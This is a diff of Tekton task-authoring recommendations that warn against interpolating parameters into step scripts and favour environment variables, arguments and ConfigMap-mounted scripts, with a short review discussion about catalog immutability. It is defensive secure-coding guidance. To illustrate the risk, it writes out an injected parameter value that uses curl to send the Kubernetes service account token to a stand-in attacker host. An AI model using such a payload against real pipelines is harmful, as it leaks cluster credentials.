recommendations.md

```diff
@@ -60,3 +60,252 @@ On the catalog, this means that you should, where possible:
+    image: myimage
+    script: |
+      echo $(params.one)
+```
+
+If `params.one` happens to contain a quote, then the resultin shell
+script might look like this:
+
+```
+echo '
+```
+
+This script is not valid, and the task will fail:
+
+```
+sh: 1: Syntax error: Unterminated quoted string
+```
+
+This goes for standard shell scripts, python scripts or any other
+script where tekton ends up interpolating variables.  Different
+languages have different quoting rules in different contexts, but a
+maliciously formed parameter would be able to break out of any
+quoting.
+
+No amount of escaping will be air-tight.  Even python `"""` strings.
+A maliciously formed parameter just needs to include another `"""` to
+close the string:
+
+```
+    script: |
+      #!/bin/env python
+      value = """$(params.one)"""
+      print(value)
+```
+
+If the parameter has the value `"""` followed by a line break, then
+the anything after the parameter's newline will be interpreted as
+**python code**, probably causing the script to fail, or worse.
+
+Instead, use environment variables or arguments, which are not
+interpolated into the script source code:
+
+```
+  steps:
+  - name: foo
+    image: myimage
+    env:
+      - name: PARAM_ONE
+        value: $(params.one)
+    args:
+      - $(params.one)
+    script: |
+      echo "$PARAM_ONE"
+      echo "$1"
+```
+
+The script will now correctly print out the value of params.one,
+regardless of what it contains; both environment variables and
+arguments.
+
+It is worth mentioning that an interpolated script (i.e. one that has
+`$(params.values)` in it) is a security problem.  If an attacker is
+able to send in a parameter value that looks something like `$(curl -s
+http://attacker.example.com/?value=$(cat
+/var/run/secrets/kubernetes.io/serviceaccount/token))`, then the
+attacker would be able to exfiltrate the service account token for the
+TaskRun.
+
+## Extract task code (scripts) to their own files
+
+As a task grows in complexity, it becomes harder and harder to
+maintain it in-line.  Because you have already avoided interpolation
+in the script, there is no real need for the script to be in-lined
+into the Task.
+
+Use a ConfigMap for your script, and mount the configmap in the task.
+Use a single _command:_ that executes your script (optionally with
+environment variables and with parameters):
+
+
+```
+  volumes:
+  - name: scripts
+    configMap:
+      name: my-task-scripts
+      defaultMode: 0755
+  steps:
+  - name: foo
+    image: myimage
+    volumeMounts:
+    - name: scripts
+      mountPath: /mnt/scripts
+    volume
+    command: 
+    - /mnt/scripts/my-command.sh
+```
+
+This allows you to create and update your configmap from a real
+script.  An external script-file allows you to edit it stand-alone as
+a proper script file, rather than in-lined into a tekton task yaml
+file.  This gives you better completion, syntax checking, and many
+other benefits.  You can even run the script locally.
```

Comment:
hi @mogsie, I agree with this point that it becomes easy to write a script and being able to test that locally but what I was thinking was will this not make the task mutable and as per [TEP-0003](https://github.com/tektoncd/community/blob/master/teps/0003-tekton-catalog-organization.md) we should make the task immutable so that we don't break experience of the users using the tasks from the catalog.
Also the other question which I have in my mind is where to keep the script that ?

Reply:
To be honest, I submitted these as general Task authoring guidelines; not guidelines for the Catalog per se.  Maybe these guidelines should be moved somewhere more appropriate (but it makes sense that the catalog espouses the recommendations, wherever they are).

But as for immutability, checking in a Task and ConfigMap to the catalog won't gain any of the benefits of extracting the script to its own file; not easily tested, edited, shellchecked, etc.  Committing it as a _kustomize_ manifest is of course an alternative.  Internally we use kustomize for these things, but I felt it was a stretch to have a recommendation to use kustomize.  It would of course be possible to provide a kustomize manifest in the catalog, and have simple instructions to create the ConfigMap by hand (if kustomize is not desirable) `--from-file` as described in the task.